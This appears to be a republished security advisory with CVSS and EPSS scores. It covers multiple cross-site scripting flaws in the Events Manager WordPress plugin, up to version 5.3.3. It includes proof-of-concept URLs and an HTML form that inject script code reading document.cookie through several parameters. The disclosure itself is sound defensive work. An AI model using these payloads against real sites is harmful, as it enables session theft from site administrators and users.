4.3 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N
0.002 Low
EPSS
Percentile
60.5%
High-Tech Bridge Security Research Lab discovered multiple XSS vulnerabilities in Events Manager WordPress plugin, which can be exploited to perform Cross-Site Scripting attacks.
1.2 The vulnerability exists due to insufficient filtration of user-supplied data in “_wpnonce” HTTP GET parameter passed to “/wp-admin/edit.php” script. A remote attacker can trick logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
PoC (Proof-of-Concept) below uses “alert()” JavaScript function to display administrator’s cookies:
http://[host]/wp-admin/edit.php?post_type=event&page=events-manager-bookings &_wpnonce=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
1.3 The vulnerabilities exist due to insufficient filtration of user-supplied data in “user_name”, “dbem_phone” and “user_email” HTTP GET parameters passed to “/index.php” script. A remote attacker can trick user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
PoCs (Proof-of-Concept) below use the “alert()” JavaScript function to display user’s cookies:
http://[host]/?event=1&user_name=%27%3E%3Cscript%3Ealert%28document.cookie%2 9;%3C/script%3E
http://[host]/?event=1&dbem_phone=%27%3E%3Cscript%3Ealert%28document.cookie% 29;%3C/script%3E
http://[host]/?event=1&user_email=%27%3E%3Cscript%3Ealert%28document.cookie% 29;%3C/script%3E
1.4 The vulnerability exists due to insufficient filtration of user-supplied data in “booking_comment” HTTP POST parameter passed to “/index.php” script. A remote attacker can trick user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
PoC (Proof-of-Concept) below uses the “alert()” JavaScript function to display user’s cookies:
<form action=“http://[host]/?event=1” method=“post” name=“askform”>
<input type=“hidden” name=“booking_comment” value=“</textarea><script>alert(document.cookie);</script>”/>
<input type=“submit” id=“btn”>
</form>
Vulnerabilities 1.3 and 1.4 will work only against unauthorized (not logged-in) users. Successful exploitation of these vulnerabilities also requires that event with id = 1 has turned-on registration.
CPE | Name | Operator | Version |
---|---|---|---|
events manager wordpress plugin | le | 5.3.3 |